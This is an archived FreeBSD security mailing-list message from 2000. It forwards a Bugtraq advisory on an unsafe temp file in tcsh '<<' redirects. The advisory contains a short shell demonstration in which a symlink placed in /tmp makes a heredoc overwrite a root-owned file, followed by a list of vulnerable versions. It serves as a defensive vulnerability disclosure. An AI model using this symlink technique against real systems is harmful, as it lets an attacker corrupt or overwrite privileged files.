Date: Mon, 30 Oct 2000 13:26:41 -0800 From: Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca> To: freebsd-security@freebsd.org Subject: tcsh: unsafe tempfile in << redirects (fwd) Message-ID: <200010302127.e9ULRCe24280@cwsys.cwsent.com>
next in thread | raw e-mail | index | archive | help
Our tcsh appears vulnerable. So is the 44bsd-csh port. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC ------- Forwarded Message [headers removed] Message-ID: <39FBAAF7.D4F258A4@energymech.net> Date: Sun, 29 Oct 2000 04:43:35 +0000 Reply-To: proton <proton@ENERGYMECH.NET> Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> From: proton <proton@ENERGYMECH.NET> Subject: tcsh: unsafe tempfile in << redirects To: BUGTRAQ@SECURITYFOCUS.COM PROBLEM: /tmp# echo 'hello world' > rootfile /tmp# chmod 600 rootfile /tmp# ln -s rootfile sh$$ /tmp# chown -h 666.666 sh$$ /tmp# ls -l rootfile sh$$ - -rw------- 1 root root 12 Oct 29 03:55 rootfile lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 -> rootfile /tmp# cat <<BAR ? FOO ? BAR FOO o world /tmp# ls -l rootfile sh$$ /bin/ls: sh12660: No such file or directory - -rw------- 1 root root 12 Oct 29 03:56 rootfile /tmp# cat rootfile FOO o world /tmp# VULNERABLE VERSIONS: 6.07.02 (Astron) 1996-10-27 6.08.00 (Astron) 1998-10-02 6.09.00 (Astron) 1999-08-16 (latest) (no other versions tested) FIX: make sure root (and other sensitive user accounts) doesnt have any predictable jobs (cron, ~/.cshrc, ...) that uses tcsh AND `<<' redirects. patch the source somehow.. (available at ftp://ftp.astron.com/pub/tcsh/ ) /proton ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200010302127.e9ULRCe24280>